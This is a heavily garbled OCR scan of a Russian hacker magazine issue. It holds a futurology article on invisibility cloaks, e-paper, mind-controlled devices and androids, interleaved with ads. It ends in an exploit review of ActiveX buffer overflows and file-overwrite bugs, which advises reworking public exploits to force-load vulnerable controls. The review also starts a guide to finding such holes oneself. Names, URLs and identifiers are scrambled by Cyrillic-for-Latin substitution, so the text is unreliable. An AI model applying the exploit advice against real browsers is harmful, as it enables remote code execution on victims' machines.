показывал необразованному народу, на что в принципе способна наука. 
Вто время невидимость казалась делом простым: проглотил чего-то там 

— и все нормально, через деньты уже прозрачный, как стекло. А если 
надо сделать невидимым какой-нибудь предмет — пожалуйста, есть не- 
видимая краска. Покрасил ей, к примеру, 1 0-сантиметровый слой железа 

— и получил стальное стекло, из которого и крышу можно сделать, и под 
водой на большой глубине домик. 

Как оказалось позднее, в науке простых путей нети даже самые очевид- 
ные вещи вначале нетакочевидны исследователям. Но, несмотря на это, 
теория невидимости уже год как существует в виде прикладной науки. 
Самый простой способ сделать из человека невидимку предложили япон- 
цы. Способ остроумный и достаточно простой: конструируем плащ из гибко- 
го 1_Е0-экрана, на краях которого ставим ряд видеокамер, передающих 
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изображение на противоположную сторону. В 
итоге, когда ты наденешь этот плащ, камера 
на затылке нарисует на передней его части 
то, что находится сзади тебя, и люди, которые 
будут смотреть на тебя прямо, увидят все то, что 
покажетзадняя камера. И наоборот — камера, 
расположенная спереди, изобразит сзади тебя 
картину того, что происходит перед тобой. 

Естественно, эта мегатехнология не дает 
полной невидимости, а скорее служитсредс- 
твом продвинутого камуфляжа. Ведь если ты 
будешь куда-то бежать в таком плаще, то будет 
виднотвои очертания и складки материала, из 
которого изготовлен дисплей. Но все равно, если 
ты решишь погулять в нем по улице, даже такая 
нехитрая технология заставит многих сказать: 

«Шаман, однако!» 

Этот камуфляжный плащ — изобретение профессора Токийского уни- 
верситета СусумуТачи (ЗизитиТасЫ) аж 2003 года. То есть, по сути дела, 
накидка-хамелеон существуетуже 4 года. 

Сегодня это уже более чем реальный девайс, который профессор собира- 
ется сделать одним из хитов на мировом рынке. Плащ представляет собой 
обычную накидку из зеленого пластика, служащую одновременно обыч- 
ным плащом-дождевиком и полупрозрачным экраном для спрятанного 
под ним проектора. Как говоряточевидцы, эффект от ее использования 
для наблюдателя просто потрясающий. Такое впечатление, что идет не 
человек, а знаменитый хищник, с которым боролся железный Арни. 
Физики-фотоники пошли дальше профессора Тачи и решили разработать 
честную теорию невидимости. 

По сути дела, предмет невидим тогда, когда световые волны, падающие на 
него, не меняют направления после взаимодействия с ним или обтекают 
его. Достичь этого трудновато, поскольку все волны, падающие куда-либо, 
сразу отражаются или же поглощаются телом. Твоим телом, кстати, тоже. 
Вот если сделать что-то вроде капсулы, проходя по поверхности которой, 
световые волны огибали бы заключенный в ней объект, то можно считать, 
что первая «шапка-невидимка» в мире существует. 

Поверхность такой капсулы должна быть достаточно хитроумной: важно, 
чтобы все фотоны, падающие на нее, правильно перенаправлялись и выпус- 
калисьсдругой стороны без изменения направления —только тогда можно 
говорить о невидимости. Но сделать это можно, поскольку, кроме теории, 
есть еще и практика, и недавно добиться невидимости ученым удалось в 
миллиметровом диапазоне длин волн. Помогли в этом специальные мате- 
риалы, или метаматериалы, как их еще называютученые из-за необычных 
оптических свойств. Как говорит доктор Джон Пендри, первооткрыватель 
невидимых материалов, в будущем можно будетукрыться в сфере из мета- 
материала и оставаться вместе с ней абсолютно невидимым для окружаю- 
щих. Однако чтобы эта «шапка-невидимка» стала реальностью, материалы 
придется разрабатывать на наноуровне, а это представляетзначительную 
сложность. Однако это не невозможно, поэтому, как говорит Пендри, капсула 
невидимости может появиться уже через десятилетие. 

Пока метаматериалы могут спрятать от взгляда стороннего наблюдате- 
ля частицы микронного размера. И это уже было продемонстрировано 
учеными. 

Теперь Пендри и его коллеги хотят сделать невидимым какой-нибудь объ- 
ект размером несколько миллиметров, например муравья. Для этого будет 
задействован совершенно новыйтип метаматериалов с наноразмерными 
включениями. Все это очень хорошо, но никто не уточняет, что будет видно 
человеку, помещенному втакой кокон. Скорее всего, вообще ничего :],так 
что нашалить втаком состоянии, какэто делал человек-невидимка, вряд 
ли удастся. 



еГутенберг 

Еще один второстепенный, но обязательный 
элементлюбого футурологического прогноза 
— быстрый доступ к информации, который у 
разныхавторов воплощается в «информацион- 
ных кристаллах», «электронных газетах» и даже 
в «информационном поле», окружающем всю 
Землю. 

На самом деле, за этими хитрыми понятиями 
стоят вполне понятные вещи: у будущего чело- 
века должен быть свободный и быстрый доступ к 
информационной базе человечества. 

Какты понимаешь, частично это произошло 
еще десятилетие назад, когда окреп интернет. 
Сегодня проблем с наличием информации не 
возникает — ее порой даже слишком много. Зато 
способов ее получения раз, два — и обчелся: 
радио, ТѴ, компьютер, газеты и мобильный. Ну и сплетни, разумеется. В 
этом смысле электронная газета — почти идеальный вариант для взаимо- 
действия с новостями. 

Представь себе гаджет, размером и формой напоминающий обычную 
авторучку, но разворачивающийся в листтипа свитка, на котором и будет 
отображаться вся нужная инфа. При этом сам свиток сенсорный, что дает 
массу преимуществ при работе с ним. Что-то подобное мы уже видели в 
іРЬопе — сенсорное управление, большой экран. Но это все же телефон, а 
не газета. 

Сегодня электронными книгами и газетами мало кого удивишь — они 
есть и пользуются спросом. Но все они достаточно большого размера и не 
напоминаютту самую электронную газету, которую ты мог видеть в фильме 
«Особое мнение». Электронная книжка больше походит на КПК, чем собс- 
твенно на книжку. Отсюда и позаимствованные от КПК проблемы: малое 
время работы, небольшой дисплей и т.д. 

Девайс, похожий на обычную газету, только сенсорный и полностью 
представляющий собой дисплей, отображающий не только текст, но 
и видео со звуком, больше подходит для быстрого доступа к информа- 
ции. Пользователю нужно будет купить однутакую газетенку, и потом он 
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Недавно израильская компания 
Юевіа разработала новую 
технологию определения 
биометрических показателей, 
основанную на считывании 
динамических электрофизио- 
логических характеристик, ко- 
торые вырабатывают наш мозг, 
сердце и легкие. Чтобы система 
идентифицировала индивиду- 
ума, человекдолжен загрузить 
свою В05-картину (Ьіосіупатіс 
відпаіиге] втечение примерно 
восьми секунд посредством 
специального оборудования 
(длительность зависит отуровня 
требуемой точности). После 
этого никакие другие устройства 
считывания нетребуются. 
Малый размер, доступность 
производства, долговечность 
датчиков и минимум энергии, 
потребляемой системой, 
создают все предпосылки для 
ее использования в бытовой 
электронике, периферийных 
устройствах, персональных 
компьютерах, мобильных 
телефонах, КПК, смарт-кар- 
тах и даже удостоверениях 
личности. 

Компания рассчитывает 
продавать чипы ВйБ произ- 
водителям биометрической 
продукции. 




>32-электродный аналог электроэнцефалографа 



сможет пользоваться инфой, как ему заблагорассудится. 

В недалеком будущем крупные газеты могут сами перейти 
в виртуальность, используя систему платной подписки, 
например, или же существуя за счет рекламы. Ты просто 
будешь загружать любой выпуск или видеоролик через 
беспроводное подключение на свой гаджет и наслаждать- 
ся обновленной версией старого доброго печатного дела. 
Сегодня так функционирует масса изданий в интернете. 
Какты понимаешь, дело за малым — осталось только ввести 
электронную бумагу в повседневный обиход. Прототипы таких 
устройств уже есть, и с каждым годом они совершенствуются. 
Крупные компании (Батзипд, Бопу, Рапавопіс, Рщ’Изи) 
делают ставки на разновидность электронной бумаги, в 
которой изображение формируется электронными чер- 
нилами безо всякой сторонней подсветки, из-за чего оно 
больше походит на напечатанный текст. 

С 2003 года на рынке работает компания Е Іпк, произво- 
дящая подобные дисплеи для часов (в основном фирмы 
Сііііеп) и медицинскихустройств. Основная фишка их 




>Актроид йЕР2уже готов к работе по вызову 



потенциала капсулы становятся то полностью черными, то 
полностью белыми. Также возможен промежуточный 
вариант — микрокапсула разделяется пигментами 
пополам для того, чтобы сформировать субпиксель. Это 
повышает разрешение картинки при использованиитого 



«ХОТЯ НА РЫНКЕ ПОКА ЕЩЕ НЕТ БОЛЬ- 
ШОГО ВЫБОРА ПОДОБНЫХ ДЕВАЙСОВ, 
БУМАЖНЫЕ ИЗДАНИЯ УЖЕ ЗАДУМЫВА- 
ЮТСЯ О ПОЛНОМ ПЕРЕХОДЕ НА ТАКИЕ 
НОСИТЕЛИ. ТАК, БЕЛЬГИЙСКАЯ ФИНАН- 
СОВАЯ ГАЗЕТА ОЕТЫй УЖЕ» 



технологии заключается в том, что изображение остается 
даже тогда, когда на дисплей не подается питание. То есть 
один раз отобразил страницу — и читай на здоровье, не 
беспокоясь о состоянии батарей. 

Достичь этого удалось с помощью специальных нано- 
частиц пигмента. Сам же дисплей Е Іпк состоит из слоя 
микрокапсул, содержащих белый и черный пигменты. 

Он расположен на электронной плате, генерирующей 
«развертку» из электрических полей. В зависимости от их 



же числа пикселей-микрокапсул. 

В июне 2005 года компания представила на суд обще- 
ственности прототип уже цветной КПК-книги с диагональю 
дисплея 6 дюймов на основе фирменнойтехнологии Е Іпк. 
Прототип формировал картинку с разрешением 
400x300 пикселей (83 брі) при глубине цвета 1 2 бит. 
Оказалось, что благодаря переключаемым нанокапсулам 
энергопотребление электронной газеты в 1 00 (!) раз мень- 
ше, чем утакой же І_СО-читалки. 
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Однако цветной вариантэлектронной газеты пока 
нельзя сгибать, но компания Рідіібіі уже обошла это 
препятствие и представила гибкий прототип элект- 
ронной газеты. 

Хотя на рынке пока еще нет большого выбора подоб- 
ных девайсов, бумажные издания уже задумываются 
о полном переходе на такие носители. Так, бельгий- 
ская финансовая газета йе Туб уже выпускается в 
виртуальном пространстве, а знаменитая ЫеѵѵУогк 
Тітез сегодня тестирует самую оптимальную плат- 
форму для своего распространения. Пока цены на 
электронные газеты кусаются — сегодня подобный 
девайс стоит около $400. 

Но через год-два еРарегбудет распространяться по 
цене ниже $1 00. А в недалеком будущем этот гаджет 
может и вовсе заменить большую часть бумажных изда- 
ний. Действительно, зачем почем зря вырубать леса? 

Сила мысли 

Один из самых излюбленных приемов фантастов 
— описание мысленного управления всякими при- 
борами. То есть ты надеваешь себе на голову некий 
«электрочайник», и он переводиттвои мысли на 
вполне понятный гаджетам языкэлектроники. Зачем 
это нужно, думаю, можно не объяснять — кто откажет- 
ся от удовольствия мысленно попереключать каналы 
на ящике, отказаться отпривычной мыши, мысленно 
водя курсором по монитору, или же поуправлять до- 
машней электроникой и освещением силой мысли. 
Нельзя сказать, что способ, который придумали для 
всего этого, — прорыв в науке и технике. О том, что 
мозг излучает слабые электромагнитные волны, было 
известно еще в 30-е годы прошлого века. На голову 



надевали громоздкие энцефалографы, брили виски, 
и после нехитрых манипуляций доктор видел, какие 
процессы проходят в мозгутого или иного пациента. 
При этом уже вто время понимали, что картины 
электромагнитных полей в целом отображаютход 
мыслей человека. Нотогда не хватало вычислитель- 
ных мощностей, чтобы в реальном времени зафик- 
сировать электромагнетику мозга и отделить зерна 
от плевел, определив, думаешь л и ты о том, чтобы 
поднять левую руку, или же мысленно представля- 
ешь себе что-то съедобное. Тем более что до сих пор 
никто не могточно определить, какие картины полей 
соответствуют тем или иным состояниям ума. 

В середине 80-х — начале 90-х годов прошлого века 
крупные компании начали выделять деньги на раз- 
работку гаджетов, которые могут читать мысли. И уже 
сегодня стали ощутимы результаты. Если ранее нуж- 
но было вживлять электроды в мозгобезьяны, для 
того чтобы она могла мысленно отдать приказ роботу 
выдать ей банан, то сегодня все проще — достаточно 
шлема с 32 электродами или тонкого обруча. 

Но лучше всего использовать для этих целей ряд 
инфракрасных датчиков, которые наиточнейшим 
образом измеряюттемпературу отдельных участков 
головного мозга. Подобную идею предложила ком- 
пания НіЕасЬі, создающая свой вариант«мозгового 
интерфейса». Температура отдельных участков 
будет свидетельствовать об активности тех или 
иных отделов головного мозга. Система простая и 
эффективная. Пока с помощью прототипа НйасЫ 
можно отдавать толь ко одну мысленную команду: 
включать или выключать питание игрушечной мо- 
дели паровозика на детской железной дороге 



о 

5таЛТгаск' 

носители информации и аксессуары 

Акция проводится с 01 апреля по 31 июля 2007 г. 
Подробности акции на шшш.вшагіігаск.ги 



Сезон 

охоты 

пришли 

5 разных изображений 
животных с любых 
упаковок с дисками 
ЗтагІТгаск 

и выиграй 



один из суперпризов 




Каждый участник акции гарантировано 
получает брелок-фонарик. 



Письма с обязательным указанием ФИО, 
номера телефона и обратного адреса 
(индекс обязателен) необходимо направлять 
по адресу: 123007, г. Москва, а/я 17 

с пометкой «Сезон охоты» 

Внимание! 

На полиграфии для банок 2 изображения 
животного, поэтому ты можешь обмениваться 
одним из них со своим другом или знакомым. 




ВшВор /тлгллѵлтсотсопзЯ 
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і ѵ_/иа іч>~ічіл и упѵ\~ 

верситета Хироши Ишигуро 

— создатель собственного 
киберблизнеца. Его двойник 
по имени ОетіпоісІ (бетіп 

— по-латыни как раз «двой- 
ник», «близнец», а оісі — извес- 
тный суффикс, указывающий 
на подобие) выполнен как 
точная копия профессора. 

Тело с 46 степенями свободы 
было скопировано с Ишигуро 

и сделано компанией Кокого 

— той самой, что производит 
актроидов. Аформа черепа 
передана посредством объем- 
ного сканирования его головы. 
Более того, андроид бетіпоісі 
также унаследовал и некото- 
рые манеры своего родите- 
ля-двойника. Материал кожи 

— мягкая силиконовая ткань. 
Пока что бетіпоісі подключа- 
ется сетью кабелей питания и 
не в состоянии самостоятельно 
встать с кресла. На разработку 
тела ушло всего полгода, а на 
программное обеспечение — 

3 месяца. 

Одной из причин разработки 
ОетіпоісІ, по словам профессо- 
ра Ишигуро, стала реализация 
идеи «дистанционного теле- 
присутствия», позволяющей 
отправлять на работу своего 
двойника, а самому пить пиво 
(профессор, наверное, пред- 
почтет саке). 



> Метаматериалы могут выглядеть итак 



> Мысленное печатание текста 



Через 5 лет, по словам менеджеров компании, эта техно- 
логия доберется и до конечного потребителя, и мы стобой 
тоже сможем мысленно пощелкать каналы ящика ;). 

Или лучше заставить трудиться вместо себя робота? К при- 
меру, сказать ему (мысленно, естественно): «Принеси-ка, 
друг, бутылочку пива!» — и тот сбегает на кухню, достанет ее 
из холодильника и принесет. И это тоже уже не фантастика. 
Если мысленно можно что-то включать или выключать, то 
почемутогда нельзя реализовать выполнение последова- 
тельности мысленных команд? Еще как можно! И это впервые 
удалось сделать ученым из Вашингтонского университета. 

Их разработка способна заставить робота выполнять сразу 
несколько мысленных команд! Создал это чудо техники про- 
фессор информатики Ражеш Рао вместе со своими студента- 
ми. Правда, чтобы управлять роботом, нужно надеть на голову 
«ведро» мини-энцефалографа с 32 электродами. Далее чело- 



к примеру, в фильме Спилберга «Искусственный интел- 
лект». О внутреннем наполнении подобного чуда техники 
(непосредственно ИИ) мы на этот раз говорить не будем, а 
посмотрим, можно ли сегодня сделать робота, внешне не 
отличимого отчеловека? 

Надо сказать, что проблема приближения внешнего 
вида роботов-андроидов к человеческому облику 
сводится к появлению новых органических материалов 
и адаптивного ПО, управляющего лицевыми и другими 
мышцами. В наш век силикона и скелетной анимации 
стало возможным сделать нечто похожее на человека, 
причем до такой степени похожее, что сперва диву 
даешься. 

Ты знаешь, что человеческая кожа — вещь непростая, 
и сделать ее искусственный аналогоченьтрудно. Но 
не невозможно. Ученые уже предложили специальную 



«СИЛИКОНОВАЯ ПИГМЕНТИРОВАННАЯ 
КОЖА И ГЛАЗНЫЕ ПРОТЕЗЫ, КОТОРЫЕ 
ТРУДНО ОТЛИЧИТЬ ОТ НАСТОЯЩЕГО 
«ЗЕРКАЛА ДУШИ», ДОВЕРШАЮТ КАРТИ- 
НУ - ПЕРЕД НАМИ ОДНА ИЗ НАИБОЛЕЕ 
СОВЕРШЕННЫХ КОПИЙ ЧЕЛОВЕКА» 



век-оператор наблюдает за роботом с помощью двух камер и 
монитора компьютера. Набор команд пока ограничен: ходьба 
в определенном направлении, захват одного из двух объектов 
и перенос их на одну из двух позиций. Эти объекты оператор с 
энцефалографом на голове видит на экране монитора. 
Разработка имеет человекоподобную форму, так, по словам 
Ражеша, ученым хотелось показать, что можно мысленно 
управлять гуманоидным роботом. В перспективе Ражеш 
хочет научить роботов выполнять более сложные мыслен- 
ные команды своих хозяев. Как видишь, ничего фантасти- 
ческого в чтении мыслей нет, тем более что в перспективе 
технологии «мыслеулавливания» будут совершенствовать- 
ся. Хоть пока мы и не можем мысленно выполнять та кие 
сложные операции, как надиктовывание текста силой 
одной только мысли, вместо набора его на клавиатуре, но 
первые шаги в этом направлении уже сделаны. 

Почти как люди 

Еще одна популярная среди фантастовтема — человеко- 
подобные роботы-андроиды. Эта тема хорошо освещена, 



робокожу для андроидов, которая состоит из 1 -см сили- 
конового «дермиса», покрытого тончайшим 0,2- мм слоем 
«эпидермиса» из прочного уретана. 

На ее поверхности специально расположено множество 
сверхминиатюрных выемок, вытравленных вуретано- 
вом эпидермисе с соблюдением сотовой шестиугольной 
геометрии. Они предают искусственной коже реалистичную 
текстуру. Кроме этого, под кожей находится электронагрева- 
тельная нить, поднимающая ее температуру до нормальной 
температуры человеческого тела — 36,6 градусов по Цель- 
сию. Такуж исторически сложилось, что лидерами в области 
андроидостроения являются японцы. Ежегодно прави- 
тельство Японии выделяет достаточно большие средства 
на разработку различных «интеллектуальных» роботов, в 
том числе и андроидов. Кроме того, в Японии существует 
неправительственный консорциум, состоящий из семи 
компаний, плюс Токийский университет, который занима- 
ется развитием робототехники в стране. По их прогнозам, 
в 2008 году роботы будут убираться в квартире, а к 201 6 году 
они смогут обеспечить полный комплексухода за пожилыми 
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> Смышленый робот Ражеша 



пациентами в больницах. Можно предположить, 
что, если родственники бросили тебя на попечение 
техники, приятнее будет лицезреть что-то человеко- 
образное, поэтому андроиды играют не последнюю 
роль в приоритетахученых. 

В результате за время работы Токийского универ- 
ситета и консорциума появилась масса частных 
компаний, производящих различных электронных 
кукол, чертовски похожих на людей. 

Одна изтаких кибердевушек — актроид (актриса-ан- 
дроид) Асігоісі 0ЕР2 Югатабс Епіеііаттепі ВоЬоі) 
ростом 

165 см. Детище компании Кокого поражаетсвоей 
мимикой, движениями тела и рук. Все мышцы 
рободевушки выполнены из пневматики, поэтому 
гудений сервоприводов нет. Силиконовая пигмен- 
тированная кожа и глазные протезы, которые трудно 
отличить от настоящего «зеркала души», довершают 
картину — перед нами одна из наиболее совершен- 
ных копий человека. Однако копия эта абсолютно 
безмозглая. Ей далеко до ребят из «ИИ» Спилберга. 
Но опять-таки пока далеко — лет через 1 0 уже можно 
будет проводить параллели. 

Асегодня робот просто программируется на любой 
вид несложной хореографии. Синхронизация 
движений губ и голоса происходитавтоматически. 
Можно даже арендовать актроида на вечеринку. 
Правда, в отличие от натуральных аналогов, это бу- 
дет стоить недешево — $3500 за 5 дней плюс затраты 
на программирование и обслуживание. 



Как видишь, сегодня сконструировать приличного 
андроида, похожего на человека, довольно трудно и 
дорого, но вполне возможно. 

Еще однотому доказательство — разработка южно- 
корейского Института индустриальныхтехнологий 
КІТЕСН — Еваробот (ЕѵеН-1 ). Рост Евы 1 60 см, вес 50 
кг. Она превосходно имитирует движения верхней 
части тела и владеет мимикой своего силиконового 
лица, передающей с помощью 1 5 встроенных элект- 
ромоторов радость, злость, грусть и удовлетворение. 
Кроме этого, андроид следит глазами за лицом 
собеседника, распознаетоколо 400 слов и вполне 
сносно поддерживает простую устную беседу, при 
этом обучаясь. 

1:1 в нашу пользу 

В нашем XXI веке фантасты получили прямо-таки 
удар со стороны технологий и окунулись в фэнтези 
и космические оперы — два направления, которые 
пока трудно вытащить в наш стобой мир. 

Космос — гораздо более агрессивная среда, чем мы 
думали раньше, да и астрономические расстояния 
трудно преодолеть современными машинами, 
поэтому в ближайшем будущем (лет 1 0-20) в этой 
области мало что изменится. 

Ну а развитие науки, информационных и нейро- 
технологий в это и следующее десятилетие даст 
гораздо большеудивительных вещей, чем могут 
придумать сегодня самые продвинутые футурологи. 
И это нам стобой еще предстоит увидеть, □с 




Оптические диски, 
дискеты и аксессуары 



Акция проводится 
с 1 апреля по 31 июля 2007 г. 



ноутбук 

МРЗ плеер • радиотелефон 




Реклама 

МОГУТ 

СТАТЬ 

ТВОИМИ! 

ЗтагІВііу объявляет КОНКУРС 

на лучшую работу из твоего 
собственного архива. Размести 
на сайте БтагіВиу интересные 
фотографии, коллаж или рисунок - 
и ты сможешь выиграть один 
из суперпризов или получить 
поощрительный приз от 
БтагіВиу. 

ОЦЕНИВАЮТ РАБОТЫ 
ПОСЕТИТЕЛИ САЙТА! 



Голосуй или 
проиграешь! 
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Подробности на шиш.шаіГЬиусІьс.ги 








Персональный компьютер стремительно превращается в «интеллектуальный терми- 
нал», подключенный к сети. Все больше и больше производителей мигрируют в сторону 
АсНѵеХ- компонентов, лавинообразный рост уязвимостей в которых я постарался деталь- 
но описать, чему и посвящен весь сегодняшний обзор эксплойтов. Мы не только покажем, 
как реанимировать эксплойты, выловленные в дикой природе, но и расскажем о технике 
самостоятельного поиска дыр в АсПѵеХ-компонентах. 
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> Вот такая она, НеѵѵІеИ-Раскагб! 



Переполнение буфера 
в НеѵѵІеи-РаскагсІ Мадѵіеѵѵ 

АсііѵехШШШІМіШШаі 



Вгіеі 

1 1 мая 2007 года коллектив ТЬе боосііеііаз 
Бесигііу РезеагсЬ Теат обнаружил уязви- 
мость типа переполнения буфера в АсІіѵеХ- 
компоненте Мадѵіеѵѵ от Неѵѵіеіі-Раскагсі, 
входящем в состав продукта ИР Оідііаі 
Ітадіпд ТооІЬох. Ошибка возникает при 
передаче методу ОеІеіеРгобІе неожиданно 
длинной строки, что приводиткаварийному 
завершению работы ІЕ или переходууправ- 
ления на зЬеІІ-код, отправляемый вместе с 
переполняемой строкой и расположенный 
в стековой памяти. Для реализации атаки 
хакеру достаточно заманить жертву на ѵѵеЬ- 
страницу с эксплойтом или послать ей Ыті- 
письмо. За более подробным описанием 
уязвимости обращайся на ѵѵѵѵѵѵ.зесигіЫосиз. 
сот/ЬісІ/23941 . 

ТагдеіБ 

Ошибка содержится в динамической 
библиотеке Ьрдѵѵѵосх.сІЦ с версией файла 
1 .0.309 (версия продукта — 2.0.309). О дру- 
гих версиях ничего неизвестно. 

Ехріоіі 

Демонстрационный эксплойт, вызываю- 
щий аварийное завершение ІЕ, лежит на 
уууууу.зесипЫосиз.сот/Ыс1/23941 . Однако 
он неявно требует, чтобы соответствующий 
АсІіѵеХ- компонент уже был установлен на 
атакуемой системе, что достаточно мало- 
вероятно, поэтому я немного доработал 
его, выложив уязвимый АсІіѵеХ на свой 
сервер. 

Зоіиііоп 

Запретить ІЕ использовать АсІіѵеХ-ком- 
понентс СІ_ЗЮ, равным ВА726ВЕ9-Е02Р- 
461 В-9447-С05С7066СЕ80, по методике, 
описанной в разделе Іи II сіізсіозе. 




> Исходный текст генератора боевых 
НТМІ_-эксплойтов р заливающих на целе- 
вой компьютер произвольный ехе-файл и 
запускающих его на выполнение 



Переполнения буфера щ 
в МсАіее Зесигііу Сепіег 

АсііѵеХИ^ШШ^МІ 



ВгіеІ 

В МсАІее Бесигііу Сепіег (конструктивно 
реализованном в виде АсІіѵеХ- компонента) 
обнаружено сразу несколько ошибок пере- 
полнения буфера, допускающихудаленный 
захватуправления. Дефекты проектирова- 
ния гнездятся в методах ІзОІсІАррІпзІаІІесІ, 
ВеШзегРедізІегесІРогВаскепсІ и 
ІзОІсІАррІпзІаІІесІ, сосредоточенных в дина- 
мической библиотеке МсБиЬМдг.ОЕБ. 
Подробнее об этом можно прочитать на 
уууууу.зесипЫосиз.сот/Ыс1/23909 . 
уууууу.зесипЫосиз.сот/Ыс1/23888 
и ѵѵѵѵѵѵ . зесигіЫосиз.сот/агсЫѵе/І /468046 . 

Тагдеіх 

Уязвимость подтверждена в следующих 
версиях МсАІее ѴігизБсап: 10.0.27, 10.0.21 ; в 
МсАІее БесигіІуСепІег: 7.0, 6.0.22, 6.0, 4.3; в 
МсАІее 5есигіІуСепІег4.3. 

Ехріоііз 

В Сети валяется множество боевых экс- 
плойтов, которые можно скачать, напри- 
мер , с уѵууѵѵлхШжШіШіСОш/шші^ и 

сІоѵѵпІоасІз.зесигіЫосиз.согп/ѵиІпегаЬіІіІіез/ 
ехрІоіІз/23888.с . Однако все они рассчитыва- 
ют, что соответствующий АсІіѵеХ- компонент 
уже установлен. Поэтому рекомендуется 
слегка доработать код эксплойтов, включив 
втэг <оЬ]ес1 сІаззісІ= ,, сІ5ІсІ:9ВЕ807В2- 
329С-442А-А4АС-АВА9О7572602"> атрибут 
С0РЕВА5Е для принудительной загрузки 
АсІіѵеХ-компонента с указанного 1)РІ_, как 
было показано в предыдущем примере. 

Боіиііоп 

Установить исправленные версии 
МсАІее БесигіІуСепІег (7.2.147) и МсАІее 
БесигіІуСепІег (6.0.0.25) и/или запретить ІЕ 
использовать АсІіѵеХ-ком понент с СІ_5Ю, 
равным 9ВЕ807В2-329С-442А-А4АС- 
АВА9О7572602, по методике, описанной в 
разделе Іиіі сіізсіозе. 



взлом 




>Сообщение о дыре в тсізаииі.сіи, опубли- 
кованное хакером АпбгегТагазсо Асип 



Удаленное выполнение кода 
в Ѵ\/іпсІоѵѵ5 Месііа^егѵегИ Н* 



Вгіеі 

В начале мая хакер по имени АпсІгезТагазсо 
Асип обнаружил дыру в АсІіѵеХ-компоненте 
ѴѴіпсІоѵѵз МесІіа Бегѵег, опубликовав свое 
сообщение на уууууу.514.ез/2007/05/тз07027 
тсІзаиіЬсІІІ регтііе Іа І.Ыт . Из сообщения 
следует, что метод БаѵеАз, реализованный 
в динамической библиотеке тбзаиШ.сШ, 
позволяет перезаписывать существующие 
файлы, внедряя в них произвольный код, без 
выдачи запроса на подтверждение! По дан- 
ным Бесигііу Росиз, ошибку нашел Сосошбег 
из Рогііпеі Бесигііу РезеагсЬ со ссылкой на 
всю туже тбзаиіЬ.бИ ( ѵѵѵѵѵѵ.зесигіЫосиз. 
сот/Ьіб/23827 ). Однако, если скачать 
тбзаиіЬ.бІІ с сервера ѵѵѵѵѵѵ.біі-боѵѵпіоабз. 
сот/ЬозІз.азрЗтбзаиіЬ и заглянуть внутрь 
нее дизассемблером, мы вообще неувидим 
никакого метода БаѵеАз. Более того, у нее 
даже отсутствует С І_5Ю, и попытка регистра- 
ции этой динамической библиотеки как 
АсбѵеХ- компонента ни к чему хорошему не 
приводит. Тем не менее Місгозоіі подтвер- 
дила наличие этой уязвимости во всех своих 
операционных системахлинейки ІЧТ: отѴѴ2К 
БР4 и до Висты включительно. 

ТагдеІ5 

По утверждению М ісгозоТі;, уязвимости 
подвержены следующие системы: МісгозоЛ 
ѴѴ2К5Р4, ХР 5Р 2, Бегѵег 2003 БР2, Бегѵег 
2003 5Р1 Ііапіит-Ьазеб, 5егѵег2003 5Р2 
Ііапіит-Ьазеб. 

Ехріоііз 

Демонстрационный ргооі о! 1 сопсері ехріоіі 
лежит на ѵѵѵѵѵѵ.гпіІѵѵ0ггп.согп/ехрІоіІ5/3892 
и пытается перезаписать файл СДЬооІ.іпі. 
Пытается, потому что при запуске ІЕ из-под 
обычного пользователя это у него не 
получается. 

Боіиііоп 

Запретить ІЕ использовать АсІіѵеХ-компо- 
нентс СІ_5Ю, равным 04РЕ6227- 1 288- 1 1 й0- 
9097-00АА004254А0, по методике, описанной 
в разделе ^и II сіізсіозе. 
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1/Ісслепование 
АсііѵеХ-компонентов 
своими руками 



АсІіѵеХ-компоненты, изначально ориентированные на ІЕ и ѴѴѴѴѴѴ, 
довольно быстро завоевали популярность и в других сферах, потеснив 
классический 01_Е. Фактически и 01_Е-, и АсІіѵеХ- компоненты построены 
потехнологии СОМ, представляющей собойунифицированный механизм 
экспорта сервисов. Компонентная модельзавоевала признание поклон- 
ников Ѵізиаі Вазіс'а, 0ЕІ_РНІ и отчасти М іеговой Ѵізиаі С++, существенно 
упросив реализацию пользовательского интерфейса. С другой стороны, 
появилось множество фирм, предоставляющих готовые наборы компо- 
нентов на все случаи жизни, легко встраиваемые в любое приложение. 
Какследствие, многие программы (даже не имеющие никакого отно- 
шения ни к ѴѴѴѴѴѴ, ни к интернету) при установке на компьютер тянутза 
собой кучу АсІіѵеХ-компонентов, доступных нетолько из приложения, их 
установившего, но в том числе и через ІЕ. Достаточно открыть страничку, 
вызывающую АсІіѵеХ-компонент и обращающуюся к любому из его мето- 
дов. Поскольку АсІіѵеХ-компонент представляетсобой обычный РЕ-файл 
с расширением ОСХ или 0І_І_, ему доступны все ресурсы компьютера, 
которыми только располагает пользователь, запустивший ІЕ. 

Для реализации удаленной атаки хакеру необходимо найти АсІіѵеХ-ком- 
понентс потенциально опасными или дефектными методами (например, 
позволяющими перезаписывать произвольный файл надисковой сис- 
теме или содержащими ошибку переполнения). Естественно, в первую 
очередь необходимо сфокусироваться на АсІіѵеХ-компонентах, входящих 
в штатную поставку операционной системы или устанавливаемых широ- 
ко распространенными приложениями. 

Впрочем, по умолчанию I Е устанавл ивает подписанные АсІіѵеХ-компонен- 
ты без подтверждения пользователя, а потому загрузить их на целевой узел 
не проблема. Кстати говоря, практически все АсІіѵеХ-эксплойты, встретив- 
шиеся мне в Сети, пренебрегали форсированной загрузкой компонентов, 
полагая, что они (компоненты) уже присутствуют на компьютере жертвы, 



и потому срабатывали далеко не в 100% случаев. Но использовать чужие 
эксплойты не есть хорошо, поскольку свежие дыры достаточно быстро 
затыкаются, и, чтобы выжить в этом агрессивном мире, хакеру необходимо 
научиться исследоватьАсІіѵеХ-компоненты самостоятельно. 

Нашим основным орудием станетутилита АсІіѵеХ Сопігоі Тезі Сопіаіпег 
(Т5ТСОЫ32. ЕХЕ), входящая в штатный комплект поставки Місгозоіі Ѵізиаі 
Зіибіо. Запустив ее на выполнение, в меню Ебіі найдем пункт Іпзегі Ыеѵѵ 
Сопігоі и в открывшимся диалоговом окне выберем любой понравив- 
шийся нам АсІіѵеХ-компонент (например, СаІепбагСопІго18.0). 
Теперьлезем в меню Сопігоі, видимтам пунктіпѵоке МеіЬобз и получаем 
перечень доступных методов с возможностью задания параметров вызова. 
Методов обычно бываеточень много, и даже такой простой элемент 
управления, как«Календарь»содержитих более полусотни. Большинство 
методов имеют вполне осмысленные имена (типа РгеѵіоизОау, ЫехЮау, 
Тобау), понятные даже без описания. 

Однако экспериментировать с параметрами внутри Т5ТСОІМ32.ЕХЕ чрез- 
вычайно неудобно (в частности, мы не можем формировать строки произ- 
вольной длины иначе, чем вставляя их в окно редактирования). Поэтому 
лучше вызывать АсІіѵеХ-компоненты из НТМІ_-документов, открываемых 
